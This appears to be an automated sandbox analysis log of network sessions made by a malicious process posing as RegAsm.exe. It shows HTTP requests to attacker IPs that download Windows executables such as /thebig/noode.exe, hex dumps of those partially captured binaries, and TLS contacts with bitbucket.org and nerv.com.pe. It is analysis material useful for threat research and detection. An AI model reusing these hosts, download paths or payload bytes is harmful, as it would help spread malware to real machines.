                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL}ft_%#@HZfPH@)f Bh H.text>H@H`P`.dataPHFH@`.rdata8pH`H@`@/4IH@0@.bssTfL`.edataBL@0@.idataL@0.CRT4L@0.tlsL@0.reloch "L@0B/14Z@B/29 Z@B/41XLN|\@B/55B \@B/67T]
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.021893024 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 38 30 00 00 00 00 00 61 09 00 00 00 30 c5 00 00 0a 00 00 00 cc 5d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 31 00 00 00 00 00 05 8b 01 00 00 40 c5 00 00 8c 01 00 00 d6 5d 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: @0B/80a0]@B/91@]@B/102b_@B
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.021904945 CEST1236INData Raw: fa 20 7e e7 89 cb 83 f3 01 80 fa 22 0f 44 cb eb e8 8d b4 26 00 00 00 00 8d 76 00 84 d2 74 14 8d 74 26 00 0f b6 50 01 83 c0 01 84 d2 74 05 80 fa 20 7e f0 a3 04 b0 8c 00 8b 1d 4c 87 f3 00 85 db 74 14 b8 0a 00 00 00 f6 45 d0 01 0f 85 e2 00 00 00 a3
                                                                                                                                                                                                                                        Data Ascii: ~"D&vtt&Pt ~LtEP$44$,H EFEE$,Hp4$],HCOt$L$$7,H9}uEEE UG<D$ D$
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.022017956 CEST672INData Raw: 28 89 45 ec 8b 45 78 89 45 e0 8b 45 7c 89 45 e4 8b 85 80 00 00 00 89 45 d8 8b 85 84 00 00 00 89 45 dc 8d 45 44 89 44 24 04 8d 45 f4 89 04 24 e8 6a 6f 3b 00 90 c9 c3 55 89 e5 83 ec 10 c7 45 f4 c8 17 40 00 c7 45 f8 c4 17 40 00 c7 45 fc 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: (EExEE|EEEEDD$E$jo;UE@E@EEDEEEDU}u,EEE}tEUPEEE@Hu,EEE}tEUPEEE@
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.022030115 CEST1236INData Raw: 09 8b 45 84 8b 55 80 89 50 1c b8 00 00 00 00 89 45 d0 8b 45 d0 e9 dc 01 00 00 8b 45 e4 8b 40 3c 89 44 24 08 c7 44 24 04 50 70 88 00 8b 45 0c 89 04 24 e8 98 25 48 00 89 45 d8 8b 45 e4 8b 55 d8 89 50 3c 83 7d d8 00 75 4e c7 44 24 04 00 00 00 00 8b
                                                                                                                                                                                                                                        Data Ascii: EUPEEE@<D$D$PpE$%HEEUP<}uND$E$:E|x|t|xPEE_E@<.{E@@E@HtlE@DE9t;EtptttpP
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.022038937 CEST1236INData Raw: 00 00 00 90 81 c4 8c 00 00 00 5b 5e 5f 5d c3 55 89 e5 83 ec 28 c7 45 ec 10 1f 40 00 c7 45 f0 33 1f 40 00 c7 45 f4 00 00 00 00 8b 45 f4 8b 44 85 ec eb 21 8b 45 0c 89 44 24 04 8b 45 08 89 04 24 e8 12 8f 41 00 c7 45 f4 01 00 00 00 8b 45 f4 8b 44 85
                                                                                                                                                                                                                                        Data Ascii: [^_]U(E@E3@EED!ED$E$AEEDUE@]UE@]UVS E@0E@E@E@Et$\$L$T$$]@E@ [^]U(E}t}uE$
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.022149086 CEST1236INData Raw: 28 8b 00 89 45 98 8b 45 08 8b 40 24 8b 08 89 4d 94 8b 45 08 8b 40 20 8b 18 89 5d 90 8b 45 08 8b 40 1c 8b 30 89 75 8c 8b 45 08 8b 40 18 8b 38 89 7d 88 8b 45 08 8b 40 14 8b 38 8b 45 08 8b 40 10 8b 30 8b 45 08 8b 40 0c 8b 18 8b 45 08 8b 40 08 8b 08
                                                                                                                                                                                                                                        Data Ascii: (EE@$ME@ ]E@0uE@8}E@8E@0E@E@E@EET$xUT$tUT$pUT$lUT$hUT$dUT$`UT$\UT$XUT$TUT$PUT$LUT$HUT$DUT$@UT$<UT$8UT$4UT$0UT$,UT$
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.022161007 CEST1236INData Raw: 89 4c 24 18 dd 5c 24 10 8b 75 8c 89 74 24 0c dd 5c 24 04 89 04 24 e8 19 07 34 00 c7 45 e4 02 00 00 00 e9 fc 03 00 00 8b 45 18 8b 00 8b 90 5c af 01 00 83 c2 01 89 90 5c af 01 00 c7 45 e4 11 00 00 00 e9 dc 03 00 00 8b 45 18 8b 00 8b 90 50 af 01 00
                                                                                                                                                                                                                                        Data Ascii: L$\$ut$\$$4EE\\EEPEXEE@E$ET]E0uEX}E4MEE]E40uE(8}E,E<ME(EEX]E0uE
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.022171974 CEST1236INData Raw: 8b 92 90 00 00 00 8b 1a 89 04 24 ff d1 89 03 8b 45 08 c7 80 ac 00 00 00 00 00 00 00 90 8b 5d fc c9 c3 55 89 e5 8b 45 08 c7 40 58 02 00 00 00 90 5d c3 55 89 e5 83 ec 28 c7 45 ec af 2d 40 00 c7 45 f0 b3 2d 40 00 c7 45 f4 01 00 00 00 8b 45 f4 8b 44
                                                                                                                                                                                                                                        Data Ascii: $E]UE@X]U(E-@E-@EED2ED$ED$ED$E$TuFEEDU Ef.@E.@EL.@E2.@EEDE@XqEEDE@bqEED
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.022701979 CEST1236INData Raw: 00 dd 45 88 dd 5c 24 78 d9 cd 8b 45 84 89 44 24 74 8b 45 80 89 44 24 70 8b 85 7c ff ff ff 89 44 24 6c 8b 85 78 ff ff ff 89 44 24 68 dd 5c 24 60 d9 cb 8b 85 74 ff ff ff 89 44 24 5c 8b 85 68 ff ff ff 89 44 24 58 8b 85 70 ff ff ff 89 44 24 54 8b 85
                                                                                                                                                                                                                                        Data Ascii: E\$xED$tED$p|D$lxD$h\$`tD$\hD$XpD$TdD$PXD$L\$D`D$@\$8TD$4PD$0LD$,|$(\$ \$\$T$\$$.C0u8}
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.022722006 CEST1236INData Raw: 70 ff ff ff 89 44 24 54 8b 85 64 ff ff ff 89 44 24 50 8b 85 58 ff ff ff 89 44 24 4c 8b 85 60 ff ff ff 89 44 24 48 dd 5c 24 40 8b 85 54 ff ff ff 89 44 24 3c 8b 85 50 ff ff ff 89 44 24 38 8b 85 4c ff ff ff 89 44 24 34 8b 85 48 ff ff ff 89 44 24 30
                                                                                                                                                                                                                                        Data Ascii: pD$TdD$PXD$L`D$H\$@TD$<PD$8LD$4HD$0DD$,D$(@D$$D$ <D$|$t$\$L$\$$:8,E0E8E$EExEpME@UEE\EELME


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        5192.168.2.949713176.113.115.33807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.261471987 CEST207OUTHEAD /thebig/noode.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 176.113.115.33
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.084336996 CEST377INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.14.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:08 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 3143204
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Content-Description: File Transfer
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=noode.exe
                                                                                                                                                                                                                                        Content-Transfer-Encoding: binary
                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                        Cache-Control: must-revalidate
                                                                                                                                                                                                                                        Pragma: public
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.085005045 CEST206OUTGET /thebig/noode.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 176.113.115.33
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.443238020 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.14.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:09 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 3143204
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Content-Description: File Transfer
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=noode.exe
                                                                                                                                                                                                                                        Content-Transfer-Encoding: binary
                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                        Cache-Control: must-revalidate
                                                                                                                                                                                                                                        Pragma: public
                                                                                                                                                                                                                                        Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F@@@P,CODE0 `DATAP@BSS.idataP@.tls.rdata@P.reloc@P.rsrc,,@P@
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.443284988 CEST224INData Raw: 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: @Pstring<@m@)@(@(@)@
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.443317890 CEST1236INData Raw: 00 11 00 0b 00 24 29 40 00 04 46 72 65 65 13 00 30 29 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 16 00 4c 29 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 10 00 68 28 40 00 09 43 6c 61 73 73 54 79 70 65 10 00 6c 28 40 00 09 43 6c 61 73
                                                                                                                                                                                                                                        Data Ascii: $)@Free0)@InitInstanceL)@CleanupInstanceh(@ClassTypel(@ClassName(@ClassNameIs(@ClassParent)@ClassInfo(@InstanceSize)@InheritsFrom)@Dispatch)@MethodAddress<*@MethodNamex*@FieldAd
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.443422079 CEST1236INData Raw: 55 83 c4 ec 89 4c 24 04 89 14 24 c7 44 24 08 ff ff ff ff 33 d2 89 54 24 0c 8b e8 8b 04 24 03 c5 89 44 24 10 8b 1d 3c c4 40 00 eb 51 8b 3b 8b 73 08 3b ee 77 46 8b c6 03 43 0c 3b 44 24 10 77 3b 3b 74 24 08 73 04 89 74 24 08 8b c6 03 43 0c 3b 44 24
                                                                                                                                                                                                                                        Data Ascii: UL$$D$3T$$D$<@Q;s;wFC;D$w;;t$st$C;D$vD$hjVu@<@uD$3|$tD$T$D$+D$T$B]_^[SVWUL$$$T$D$(D$+T$B
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.443433046 CEST1236INData Raw: c4 40 00 00 0f 84 ce 00 00 00 33 d2 55 68 b4 1a 40 00 64 ff 32 64 89 22 80 3d 32 c0 40 00 00 74 0a 68 1c c4 40 00 e8 66 f8 ff ff c6 05 15 c4 40 00 00 a1 74 c4 40 00 50 e8 34 f8 ff ff 33 c0 a3 74 c4 40 00 8b 1d 3c c4 40 00 eb 12 68 00 80 00 00 6a
                                                                                                                                                                                                                                        Data Ascii: @3Uh@d2d"=2@th@f@t@P43t@<@hjCP%<@u<@L@x@u4@t4@P4@udh@=2@th@h@C[]S;h@uPh@P
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.443444014 CEST1236INData Raw: 00 33 d2 c1 e8 02 3d 00 04 00 00 77 16 8b 15 74 c4 40 00 8b 54 82 f4 85 d2 75 08 40 3d 01 04 00 00 75 ea 8b c2 c3 8d 40 00 53 56 57 55 8b f0 bf 68 c4 40 00 bd 6c c4 40 00 8b 1d 60 c4 40 00 3b 73 08 0f 8e 84 00 00 00 8b 1f 8b 43 08 3b f0 7e 7b 89
                                                                                                                                                                                                                                        Data Ascii: 3=wt@Tu@=u@SVWUh@l@`@;sC;~{s[;sB;tcuNu3;u)u}}u3Ep@5p@@5@L6S+|`;uC
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.443553925 CEST896INData Raw: e8 30 f7 ff ff 83 3c 24 0c 7c 1b 8b dd 03 de 8b 04 24 83 c8 02 89 03 8b c3 83 c0 04 e8 c8 f7 ff ff e9 fe 00 00 00 8b f7 e9 f7 00 00 00 8b c6 2b c7 89 44 24 04 3b 1d 70 c4 40 00 75 67 a1 6c c4 40 00 3b 44 24 04 7c 53 8b 44 24 04 29 05 6c c4 40 00
                                                                                                                                                                                                                                        Data Ascii: 0<$|$+D$;p@ugl@;D$|SD$)l@D$p@=l@}l@p@5l@3l@+@E%uUuMH$$;L$s$$)D$,fD$)$<$|$:4$#
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.443564892 CEST892INData Raw: 90 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e 74 15 8b 48 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a 48 01 3a 4a 01 75 25 4e 74 08 8a 48 02 3a 4a 02 75
                                                                                                                                                                                                                                        Data Ascii: SVQt&9uENtHZ9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[Wfx_i,@B,@SVWPtQ11F t-tE+tB$tBt20w*9w&Fu
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.443577051 CEST1236INData Raw: 85 f6 74 14 66 8b 3e 83 c6 06 8a 4e 06 38 d9 74 18 8d 74 0e 07 4f 75 f2 8b 40 ec 85 c0 75 de 5a eb 1b 8a 1a 8a 4e 06 eb e8 8a 5c 0e 06 32 1c 0a 80 e3 df 75 ed 49 75 f1 8b 06 5a 01 d0 5f 5e 5b c3 52 51 53 ff 50 f4 31 d2 8d 4c 24 10 64 8b 1a 89 19
                                                                                                                                                                                                                                        Data Ascii: tf>N8ttOu@uZN\2uIuZ_^[RQSP1L$diA*@Ad[YZD$,@&R=@vjjjh=@tPPRTjjhyXTjjheX=@vPs=@vP
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.443587065 CEST224INData Raw: 44 24 04 83 c1 05 64 89 02 ff d1 c2 0c 00 c3 8b c0 89 14 24 e9 cd 0e 00 00 c3 8d 40 00 55 8b ec 8b 55 08 8b 02 3d 92 00 00 c0 7f 2c 74 5c 3d 8e 00 00 c0 7f 15 74 57 2d 05 00 00 c0 74 5c 2d 87 00 00 00 74 3d 48 74 4e eb 60 05 71 ff ff 3f 83 e8 02
                                                                                                                                                                                                                                        Data Ascii: D$d$@UU=,t\=tW-t\-t=HtN`q?r6t0R=t=-t.HtHt$:-t/=t&,*&"%RX]D$@uk2T$jPh<0@R
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.443661928 CEST1236INData Raw: ff 8b 5c 24 04 81 3b ce fa ed 0e 8b 53 14 8b 43 18 74 1d 8b 15 0c c0 40 00 85 d2 0f 84 1c ff ff ff 89 d8 ff d2 85 c0 0f 84 10 ff ff ff 8b 53 0c e8 78 fb ff ff 8b 0d 00 c0 40 00 85 c9 74 02 ff d1 8b 4c 24 04 b8 d9 00 00 00 8b 51 14 89 14 24 e9 b1
                                                                                                                                                                                                                                        Data Ascii: \$;SCt@Sx@tL$Q$11Edd@0@h@1@d9udt9u@j@@@4.@@S=@}!hj@


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        6192.168.2.949714185.166.143.48807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.266283989 CEST171OUTData Raw: 16 03 03 00 a6 01 00 00 a2 03 03 66 ee c0 87 8d c6 17 46 0e ad 95 85 f8 75 f2 7a 42 3f 3e 21 e5 8c ae b8 bc 1f 68 2f e4 c1 61 c2 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f
                                                                                                                                                                                                                                        Data Ascii: fFuzB?>!h/a&,+0/$#('=<5/Sbitbucket.org#
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.891916037 CEST156INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                        content-length: 11
                                                                                                                                                                                                                                        content-type: text/plain
                                                                                                                                                                                                                                        date: Sat, 21 Sep 2024 12:48:08 GMT
                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                                                        Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                        Data Ascii: Bad Request


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        7192.168.2.949716162.241.61.218807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.483576059 CEST169OUTData Raw: 16 03 03 00 a4 01 00 00 a0 03 03 66 ee c0 87 52 2b 01 42 a9 4a 08 b2 07 57 a2 22 b0 a9 22 09 25 34 ed 9f 15 80 25 84 e7 db 83 bc 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f
                                                                                                                                                                                                                                        Data Ascii: fR+BJW""%4%&,+0/$#('=<5/Qnerv.com.pe#
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.967529058 CEST513INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:08 GMT
                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                        Content-Length: 347
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        8192.168.2.949715162.241.61.218807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.483577013 CEST169OUTData Raw: 16 03 03 00 a4 01 00 00 a0 03 03 66 ee c0 87 19 81 8f 9f 05 e4 9f ac 74 4e 4e 73 48 46 a3 e8 76 7c 26 26 b3 79 d2 48 c1 fc 4f 5c 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f
                                                                                                                                                                                                                                        Data Ascii: ftNNsHFv|&&yHO\&,+0/$#('=<5/Qnerv.com.pe#
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.963943958 CEST513INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:08 GMT
                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                        Content-Length: 347
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        9192.168.2.949717185.166.143.48807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.899231911 CEST117OUTData Raw: 16 03 01 00 70 01 00 00 6c 03 01 66 ee c0 87 df 90 74 c7 f0 1b 36 1d 3b 07 63 34 b6 4e fd c6 23 25 fb 11 73 96 5a 65 8e 3f f4 d2 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 35 00 00 00 12 00 10 00 00 0d 62 69 74 62 75 63 6b 65 74
                                                                                                                                                                                                                                        Data Ascii: plft6;c4N#%sZe?5/5bitbucket.org#
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.537723064 CEST156INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                        content-length: 11
                                                                                                                                                                                                                                        content-type: text/plain
                                                                                                                                                                                                                                        date: Sat, 21 Sep 2024 12:48:09 GMT
                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                                                        Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                        Data Ascii: Bad Request


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        10192.168.2.949718176.111.174.109807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.947329998 CEST196OUTGET /kurwa HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 176.111.174.109
                                                                                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        11192.168.2.949719162.241.61.218807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.970448017 CEST169OUTData Raw: 16 03 03 00 a4 01 00 00 a0 03 03 66 ee c0 87 73 8f 2b bb 82 bb 46 2e 70 55 7a e3 ca af 90 e6 8c 54 d9 61 29 98 21 64 31 79 c7 7d 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f
                                                                                                                                                                                                                                        Data Ascii: fs+F.pUzTa)!d1y}&,+0/$#('=<5/Qnerv.com.pe#
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.460949898 CEST513INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:09 GMT
                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                        Content-Length: 347
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
